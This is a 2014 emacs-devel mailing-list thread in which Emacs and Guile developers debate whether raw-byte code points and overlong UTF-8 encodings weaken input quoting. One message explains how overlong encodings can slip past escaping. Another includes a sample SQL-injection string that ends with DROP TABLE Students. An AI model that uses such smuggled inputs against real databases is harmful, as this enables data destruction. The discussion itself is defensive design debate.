51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
@ 2014-10-06  3:18                                       ` Stephen J. Turnbull
  2014-10-06 19:15                                         ` Richard Stallman
  2014-10-06  6:21                                       ` Mark H Weaver
  2 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06  3:18 UTC (permalink / raw)
  To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > I'd like to know how it is that "raw bytes" have security implications.
 > Are there programs that make assumptions about the contents of strings?
 > That seems like bad design.

Yes, they do, and no, it's poor implementation, not bad design --
they're conforming to standards that say that string contents will
have a specific form and are unfortunately imperfectly protected from
invalid input by their I/O modules (for example, the \201 bug in Emacs
itself).

As a consequence it's often possible to crash a program that is
incompletely robust to invalid encodings.  If that program is a
spam/virus checker, and the problem is compounded by a site policy
that accepts mail when the checker fails, anything can happen.

That's just an example.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
@ 2014-10-06  3:34                                       ` Stephen J. Turnbull
  2014-10-08  0:48                                         ` Richard Stallman
  2014-10-10 20:41                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06  3:34 UTC (permalink / raw)
  To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > Given a self-contained Scheme program, it should be easy to determine
 > whether it ever examines or sets string text properties.  Is that enough
 > to provide the same "security" benefits in practice?

No.  Often systems are constructed by assembling separately developed
modules.  If a "security" module responsible for checking data
validity is property-oblivious, then maliciously crafted properties
may be able to cause "evil" behavior in a property-sensitive module
supposedly protected by the "security" module.

This kind of problem is often exposed when the "security" module was
designed for a Scheme version without some feature (here "string
properties"), and the infrastructure is updated to an interpreter
version with the feature.

You can impugn the skills of the programmers responsible, or say it's
all very hypothetical (which I admit, not being a cracker myself I
don't know how to turn such configurations into actual exploits), but
this is a common pattern for security breaches.  It's a great service
to the Internet community for the Guile developers to worry about it
and at least document the issues faced when using Guile.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
  2014-10-06  3:18                                       ` Stephen J. Turnbull
@ 2014-10-06  6:21                                       ` Mark H Weaver
  2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-11 18:34                                         ` Florian Weimer
  2 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06  6:21 UTC (permalink / raw)
  To: rms; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     * I'm concerned that there are security implications to supporting the
>       "raw byte" code points.  I can expand on this more if you'd like.
>
> I'd like to know how it is that "raw bytes" have security implications.

To give an example, consider a procedure that needs to pass a string
from an untrusted source to an SQL query.  To do this safely, it needs
to quote the string.  I haven't researched how to properly quote SQL
string literals, but in general, quoting is typically done by
recognizing some set of special characters that must be escaped, and
allowing all other characters through unmodified.

However, "raw byte" code points can be used to bypass such a quoting
mechanism, and thus send an unescaped closing quote to the SQL database
followed by arbitrary SQL commands.

A related problem has to do with the fact that naively implemented UTF-8
allows code points to be represented with more bytes than are actually
needed, essentially by padding the code point with leading zeroes and
then encoding with UTF-8 as if the high bits were non-zero.  For
example, the ASCII quote (") can be represented as the single byte 0x22,
the two byte sequence 0xC0 0xA2, etc.

UTF-8 decoders are supposed to detect and reject these "overlong"
encodings, but it is likely that many programs fail to do this.  Such
programs are usually vulnerable to these overlong encodings when trying
to detect special characters (e.g. for quoting/escaping) or when
validating inputs.

To cope with this, the Unicode standards require that UTF-8 codecs
reject overlong encodings and other invalid byte sequences.  This is in
direct conflict with the idea of "raw byte" code points, whose purpose
is to be tolerant of arbitrary byte sequences and to propagate them
unchanged.

FWIW, I agree that the Emacs behavior is desirable when editing a file
that may contain coding errors, but in most other cases (e.g. when
communicating with processes or network sockets) I think that it's more
appropriate to refuse to accept, produce, or propagate invalid UTF-8
such as overlong encodings.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  6:21                                       ` Mark H Weaver
@ 2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-06 15:33                                           ` David Kastrup
  2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-11 18:34                                         ` Florian Weimer
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 15:08 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: monnier@iro.umontreal.ca,  dak@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  eliz@gnu.org,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 02:21:41 -0400
> 
> A related problem has to do with the fact that naively implemented UTF-8
> allows code points to be represented with more bytes than are actually
> needed, essentially by padding the code point with leading zeroes and
> then encoding with UTF-8 as if the high bits were non-zero.  For
> example, the ASCII quote (") can be represented as the single byte 0x22,
> the two byte sequence 0xC0 0xA2, etc.
> 
> UTF-8 decoders are supposed to detect and reject these "overlong"
> encodings, but it is likely that many programs fail to do this.  Such
> programs are usually vulnerable to these overlong encodings when trying
> to detect special characters (e.g. for quoting/escaping) or when
> validating inputs.
> 
> To cope with this, the Unicode standards require that UTF-8 codecs
> reject overlong encodings and other invalid byte sequences.  This is in
> direct conflict with the idea of "raw byte" code points, whose purpose
> is to be tolerant of arbitrary byte sequences and to propagate them
> unchanged.

The obvious solution is to encode the raw bytes internally in a UTF-8
compatible way.  Which is what Emacs does in its buffers and strings,
as I'm sure you know.  Can't Guile do something similar?

> FWIW, I agree that the Emacs behavior is desirable when editing a file
> that may contain coding errors, but in most other cases (e.g. when
> communicating with processes or network sockets) I think that it's more
> appropriate to refuse to accept, produce, or propagate invalid UTF-8
> such as overlong encodings.

Emacs indeed rejects them, but that doesn't mean it disallows raw
bytes as part of otherwise valid UTF-8 content.  It's a fact of life
that such stray bytes sometimes happen, and users would be generally
unhappy if Emacs would reject a file because it had such bytes.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 15:08                                         ` Eli Zaretskii
@ 2014-10-06 15:33                                           ` David Kastrup
  2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:27                                           ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 15:33 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: Mark H Weaver <mhw@netris.org>
>> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 02:21:41 -0400
>> 
>> A related problem has to do with the fact that naively implemented UTF-8
>> allows code points to be represented with more bytes than are actually
>> needed, essentially by padding the code point with leading zeroes and
>> then encoding with UTF-8 as if the high bits were non-zero.  For
>> example, the ASCII quote (") can be represented as the single byte 0x22,
>> the two byte sequence 0xC0 0xA2, etc.
>> 
>> UTF-8 decoders are supposed to detect and reject these "overlong"
>> encodings, but it is likely that many programs fail to do this.  Such
>> programs are usually vulnerable to these overlong encodings when trying
>> to detect special characters (e.g. for quoting/escaping) or when
>> validating inputs.
>> 
>> To cope with this, the Unicode standards require that UTF-8 codecs
>> reject overlong encodings and other invalid byte sequences.  This is in
>> direct conflict with the idea of "raw byte" code points, whose purpose
>> is to be tolerant of arbitrary byte sequences and to propagate them
>> unchanged.
>
> The obvious solution is to encode the raw bytes internally in a UTF-8
> compatible way.  Which is what Emacs does in its buffers and strings,
> as I'm sure you know.  Can't Guile do something similar?

If an overlong UTF-8 byte sequence representing '"' is processed
transparently by Emacs, it will be reencoded into the original
afterwards and depending on the next processing stage might trip up
software afterwards.  Of course, it would have done equally so without
Emacs (or GUILE) in the middle.  The solution obviously is to use a
coding scheme for recoding that does _not_ reproduce unencodable bytes.
Now if the intermediate processing added escape characters for the
unencodable bytes, you can arrive at something like (using % for
unencodable)

[Input] Robert%");DROP TABLE Students;--
[quotified] "Robert\%\");DROP TABLE Students;--"
[cleanencoded] "Robert\\");DROP TABLE Students;--"
[Pasted into SQL command] Uh oh.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 15:33                                           ` David Kastrup
@ 2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:40                                               ` David Kastrup
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 16:24 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: Mark H Weaver <mhw@netris.org>,  rms@gnu.org,  monnier@iro.umontreal.ca,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 17:33:21 +0200
> 
> If an overlong UTF-8 byte sequence representing '"' is processed
> transparently by Emacs, it will be reencoded into the original
> afterwards and depending on the next processing stage might trip up
> software afterwards.

Indeed.  But that's what is expected from an editor: not to change the
stuff the user didn't touch.

> Of course, it would have done equally so without Emacs (or GUILE) in
> the middle.

Right.

> The solution obviously is to use a coding scheme for recoding that
> does _not_ reproduce unencodable bytes.

An editor such as Emacs cannot do that, I think.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-06 15:33                                           ` David Kastrup
@ 2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 19:17                                             ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06 16:27 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: Mark H Weaver <mhw@netris.org>
>> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 02:21:41 -0400
>> 
>> A related problem has to do with the fact that naively implemented UTF-8
>> allows code points to be represented with more bytes than are actually
>> needed, essentially by padding the code point with leading zeroes and
>> then encoding with UTF-8 as if the high bits were non-zero.  For
>> example, the ASCII quote (") can be represented as the single byte 0x22,
>> the two byte sequence 0xC0 0xA2, etc.
>> 
>> UTF-8 decoders are supposed to detect and reject these "overlong"
>> encodings, but it is likely that many programs fail to do this.  Such
>> programs are usually vulnerable to these overlong encodings when trying
>> to detect special characters (e.g. for quoting/escaping) or when
>> validating inputs.
>> 
>> To cope with this, the Unicode standards require that UTF-8 codecs
>> reject overlong encodings and other invalid byte sequences.  This is in
>> direct conflict with the idea of "raw byte" code points, whose purpose
>> is to be tolerant of arbitrary byte sequences and to propagate them
>> unchanged.
>
> The obvious solution is to encode the raw bytes internally in a UTF-8
> compatible way.  Which is what Emacs does in its buffers and strings,
> as I'm sure you know.  Can't Guile do something similar?

I'm afraid you've misunderstood, or perhaps I've failed to explain it
clearly.

It doesn't matter how these raw bytes are encoded internally.  No matter
what mechanism we use to accomplish it, propagating invalid byte
sequences by default is bad security policy.  It has the effect of
exposing all internal subsystems to malformed UTF-8 such as overlong
encodings unless users take explicit steps to check for them and remove
them.  This is a recipe for security holes.

The Unicode standard requires that all UTF-8 codecs refuse to accept,
produce, or propagate invalid byte sequences, including the troublesome
overlong encodings.  I'm not one for blindly following standards, but in
my opinion this is the default policy we should adopt.

Editing files is an unusual case.  Of course, we want users to be able
to edit a file with coding errors, and to leave any part of the file
untouched by the user exactly as it was.  Anything else would be a
mistake.

However, I would argue that even in Emacs, string<->bytevector
conversions should be strict by default, so that other uses of them
(e.g. communication over sockets, pipes, and encoding of command-line
arguments to subprocess) should be strict by default.  Even if you
disagree, I'd like the strict mode to remain the default in Guile.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:24                                             ` Eli Zaretskii
@ 2014-10-06 16:40                                               ` David Kastrup
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-06 16:40 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: Mark H Weaver <mhw@netris.org>, rms@gnu.org,
>> monnier@iro.umontreal.ca, dmantipov@yandex.ru, emacs-devel@gnu.org,
>> handa@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 17:33:21 +0200
>> 
>> If an overlong UTF-8 byte sequence representing '"' is processed
>> transparently by Emacs, it will be reencoded into the original
>> afterwards and depending on the next processing stage might trip up
>> software afterwards.
>
> Indeed.  But that's what is expected from an editor: not to change the
> stuff the user didn't touch.
>
>> Of course, it would have done equally so without Emacs (or GUILE) in
>> the middle.
>
> Right.
>
>> The solution obviously is to use a coding scheme for recoding that
>> does _not_ reproduce unencodable bytes.
>
> An editor such as Emacs cannot do that, I think.

It sure can.  Saving with a different encoding system than the one one
started with is always an option.  Not all encoding system variants need
to be lossless, and the choice how to treat non-encodable bytes can be
part of the coding system variant.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:27                                           ` Mark H Weaver
@ 2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
                                                                 ` (3 more replies)
  2014-10-06 19:17                                             ` Richard Stallman
  1 sibling, 4 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 16:47 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: dak@gnu.org,  rms@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 12:27:35 -0400
> 
> > The obvious solution is to encode the raw bytes internally in a UTF-8
> > compatible way.  Which is what Emacs does in its buffers and strings,
> > as I'm sure you know.  Can't Guile do something similar?
> 
> I'm afraid you've misunderstood, or perhaps I've failed to explain it
> clearly.

I think I did understand your perfectly clear explanation.

> It doesn't matter how these raw bytes are encoded internally.  No matter
> what mechanism we use to accomplish it, propagating invalid byte
> sequences by default is bad security policy.

How can we be responsible for byte streams that originated outside?
That's the responsibility of the source.  And if there is a consumer,
then it is their responsibility not to trip upon such bytes.

But how can you refuse to copy such bytes when you are just a pipe
that is expected not to change anything it wasn't toild to?

Btw, Emacs doesn't expose the internal representation of these bytes
easily to Lisp programs.  That is, whenever any program tries to
access the character at that position, it gets the original raw byte
that was there before the string was read from outside.  A Lisp
program needs some very tricky and deliberate techniques to access the
internal representation of such bytes.  (It isn't "overlong", btw, we
just represent the 128 bytes as codepoints in the 0x3fffXX range, and
encode it in UTF-8 with 5 bytes.)

> The Unicode standard requires that all UTF-8 codecs refuse to accept,
> produce, or propagate invalid byte sequences, including the troublesome
> overlong encodings.

What Emacs does is interpret each byte of such invalid byte sequences
as a separate raw byte, and represent each one of them internally as
described above.  Emacs cannot "refuse to propagate" the original
sequence, because users of an editor expect it not to alter any part
of the input that wasn't explicitly modified by the user or commands
she invoked.

> I'm not one for blindly following standards, but in my opinion this
> is the default policy we should adopt.

So just passing a string unaltered through a Guile program would
change that string?  That sounds like unpleasant surprise for the
users, at least for Emacs users.  Emacs has been there around v20.x,
and we still carry the scars.  It would be a unwise, IMO, if Guile
would repeat those same mistakes.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:40                                               ` David Kastrup
@ 2014-10-06 17:04                                               ` Stephen J. Turnbull
  2014-10-06 17:34                                                 ` David Kastrup
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06 17:04 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: David Kastrup, rms, mhw, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:
 > > From: David Kastrup <dak@gnu.org>

 > Indeed.  But that's what is expected from an editor: not to change the
 > stuff the user didn't touch.

If the user thinks of the "stuff" as characters, they will be unhappy
if the editor displays raw bytes for something that could be decoded,
and they will prefer standards conforming output, if only in those
instances where non-conformant output results in an explosion in a
later processor.

Of course you are quite right that there are many cases where the user
would be happiest if the editor didn't touch byte sequence that the
user didn't explicitly tell it to touch.

My point is that neither approach is always right.

 > > The solution obviously is to use a coding scheme for recoding that
 > > does _not_ reproduce unencodable bytes.
 > 
 > An editor such as Emacs cannot do that, I think.

It should do so as an option, with the alternative being to ask for
confirmation (this would be automatically satisfied if input and
output rawbytes handlers were separate) if nonconforming output would
be produced.  Emacs of *all* editors should not produce non-conforming
output silently (unless explicitly silenced), even if it got
non-conforming input.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
@ 2014-10-06 17:31                                               ` David Kastrup
  2014-10-06 17:58                                                 ` David Kastrup
  2014-10-06 17:43                                               ` Stephen J. Turnbull
                                                                 ` (2 subsequent siblings)
  3 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:31 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

> Btw, Emacs doesn't expose the internal representation of these bytes
> easily to Lisp programs.  That is, whenever any program tries to
> access the character at that position, it gets the original raw byte
> that was there before the string was read from outside.  A Lisp
> program needs some very tricky and deliberate techniques to access the
> internal representation of such bytes.  (It isn't "overlong", btw, we
> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
> encode it in UTF-8 with 5 bytes.)

Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
encodable as 3 bytes) here?

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:04                                               ` Stephen J. Turnbull
@ 2014-10-06 17:34                                                 ` David Kastrup
  2014-10-07  0:33                                                   ` Stephen J. Turnbull
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:34 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> It should do so as an option, with the alternative being to ask for
> confirmation (this would be automatically satisfied if input and
> output rawbytes handlers were separate) if nonconforming output would
> be produced.  Emacs of *all* editors should not produce non-conforming
> output silently (unless explicitly silenced), even if it got
> non-conforming input.

That sounds like you are talking about a processing pipe.  An editor is
not really the same.  Even for something like sed I'd expect no changes
in parts that are, well, not changed.  Much more so for a proper editor.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
@ 2014-10-06 17:43                                               ` Stephen J. Turnbull
  2014-10-06 17:53                                                 ` David Kastrup
  2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-07 14:04                                               ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06 17:43 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:
 > > From: Mark H Weaver <mhw@netris.org>

 > > It doesn't matter how these raw bytes are encoded internally.  No
 > > matter what mechanism we use to accomplish it, propagating
 > > invalid byte sequences by default is bad security policy.
 > 
 > How can we be responsible for byte streams that originated outside?

By taking responsibility for them. ;-)

 > That's the responsibility of the source.  And if there is a consumer,
 > then it is their responsibility not to trip upon such bytes.

Not in a security context.  In a security context, you want defense in
depth: all separately developed components cooperate in covering up
each others' bugs by handling input carefully and refusing to transmit
broken output unless that is explicitly requested by the consumer (and
you trust it to know what it's doing when it says, "don't worry, I can
handle anything"!)

 > But how can you refuse to copy such bytes when you are just a pipe
 > that is expected not to change anything it wasn't toild to?

By signaling an error and terminating.  That's what a conformant
Unicode process does.

Note that the standard doesn't say you have to throw away state and
give up entirely.  It just says that if you do try to continue, you're
not conforming any more.

 > > The Unicode standard requires that all UTF-8 codecs refuse to
 > > accept, produce, or propagate invalid byte sequences, including
 > > the troublesome overlong encodings.

Again, what the Unicode standard says is that a codec that does any of
those things may not call itself conformant.  It doesn't say anything
about nonconformant codecs -- which include all non-Unicode codecs, of
course.  So we already know that Emacs is going to be nonconformant in
some use cases.  However, it should be aware of the fact when it is
not conforming to applicable standards.

 > So just passing a string unaltered through a Guile program would
 > change that string?

If it is a stream of bytes which is alleged to conform to some
standard but in fact does not, a program should (in general IMO, and
by the Unicode standard if it claims Unicode conformance) signal an
error and stop.  If the program wishes to pick up where it left off in
nonconformant mode and continue processing, that's fine (but it isn't
conformant any more).  In other words, "correcting" the string would
be a nonconformant behavior.

But this must be an explicit decision by the program (and it mustn't
do that if the user wants conformance).  Mark is absolutely correct
that the Guile system should not default to non-conformance, and I
don't think Emacs based on Guile should either, but that's up to the
Emacs community to decide, of course.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:43                                               ` Stephen J. Turnbull
@ 2014-10-06 17:53                                                 ` David Kastrup
  2014-10-07  0:35                                                   ` Stephen J. Turnbull
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:53 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>  > > From: Mark H Weaver <mhw@netris.org>
>
>  > > It doesn't matter how these raw bytes are encoded internally.  No
>  > > matter what mechanism we use to accomplish it, propagating
>  > > invalid byte sequences by default is bad security policy.
>  > 
>  > How can we be responsible for byte streams that originated outside?
>
> By taking responsibility for them. ;-)
>
>  > That's the responsibility of the source.  And if there is a consumer,
>  > then it is their responsibility not to trip upon such bytes.
>
> Not in a security context.  In a security context, you want defense in
> depth: all separately developed components cooperate in covering up
> each others' bugs by handling input carefully and refusing to transmit
> broken output unless that is explicitly requested by the consumer (and
> you trust it to know what it's doing when it says, "don't worry, I can
> handle anything"!)

In a security relevant context, you would just not reencode before
passing the information back to the outside.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:31                                               ` David Kastrup
@ 2014-10-06 17:58                                                 ` David Kastrup
  2014-10-07  2:35                                                   ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:58 UTC (permalink / raw)
  To: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Eli Zaretskii <eliz@gnu.org> writes:
>
>> Btw, Emacs doesn't expose the internal representation of these bytes
>> easily to Lisp programs.  That is, whenever any program tries to
>> access the character at that position, it gets the original raw byte
>> that was there before the string was read from outside.  A Lisp
>> program needs some very tricky and deliberate techniques to access the
>> internal representation of such bytes.  (It isn't "overlong", btw, we
>> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
>> encode it in UTF-8 with 5 bytes.)
>
> Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
> encodable as 3 bytes) here?

Actually, one could even use overlong encodings of 0--127 (to represent
raw bytes 128--255) and use only two bytes that way, but that's really
asking for reencoding trouble.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
  2014-10-06 17:43                                               ` Stephen J. Turnbull
@ 2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-06 23:00                                                 ` Mark H Weaver
  2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:04                                               ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-10-06 18:04 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, stephen

Please, could you move this discussion elsewhere.  While I understand
the Guile developers might want to try and reuse either Emacs's code
or at least its design and expertise, this discussion is about Guile,
not about Emacs, so please move it to a Guile mailing-list.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  3:18                                       ` Stephen J. Turnbull
@ 2014-10-06 19:15                                         ` Richard Stallman
  2014-10-07  0:46                                           ` Stephen J. Turnbull
  2014-10-10 10:09                                           ` Thien-Thi Nguyen
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-06 19:15 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > I'd like to know how it is that "raw bytes" have security implications.
     > Are there programs that make assumptions about the contents of strings?
     > That seems like bad design.

    Yes, they do, and no, it's poor implementation, not bad design --
    they're conforming to standards that say that string contents will
    have a specific form and are unfortunately imperfectly protected from
    invalid input by their I/O modules (for example, the \201 bug in Emacs
    itself).

      ...If that program is a
    spam/virus checker,...

Do people write spam/virus checkers using Guile?

This issue is specifically about Guile.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-06 16:47                                             ` Eli Zaretskii
@ 2014-10-06 19:17                                             ` Richard Stallman
  2014-10-06 19:59                                               ` David Kastrup
  2014-10-07  0:10                                               ` Mark H Weaver
  1 sibling, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-06 19:17 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

    However, I would argue that even in Emacs, string<->bytevector
    conversions should be strict by default,

What is a "bytevector"?  It doesn't appear in the Emacs Lisp
ref manual, so I suppose it is a concept from Scheme.
How would it relate into Emacs?  Maybe your suggestion is a good one.

    It doesn't matter how these raw bytes are encoded internally.  No matter
    what mechanism we use to accomplish it, propagating invalid byte
    sequences by default is bad security policy.

As a general matter, the policy that programs should not get upset
when they see invalid UTF-8 seems more secure than the policy that
programs should not propagate invalid UTF-8.  But, given the
situation, it isn't useful to debate that theoretical question.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:17                                             ` Richard Stallman
@ 2014-10-06 19:59                                               ` David Kastrup
  2014-10-07  0:10                                               ` Mark H Weaver
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-06 19:59 UTC (permalink / raw)
  To: Richard Stallman
  Cc: Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz,
	stephen

Richard Stallman <rms@gnu.org> writes:

>     However, I would argue that even in Emacs, string<->bytevector
>     conversions should be strict by default,
>
> What is a "bytevector"?  It doesn't appear in the Emacs Lisp
> ref manual, so I suppose it is a concept from Scheme.
> How would it relate into Emacs?  Maybe your suggestion is a good one.

Unibyte string minus the string part.  Basically what decoding works
from to generate strings and vice versa.

But in GUILE, you cannot use string functions on them: they are
basically arrays with byte elements.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 18:04                                               ` Stefan Monnier
@ 2014-10-06 23:00                                                 ` Mark H Weaver
  2014-10-07  1:04                                                   ` Stefan Monnier
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06 23:00 UTC (permalink / raw)
  To: Stefan Monnier
  Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen

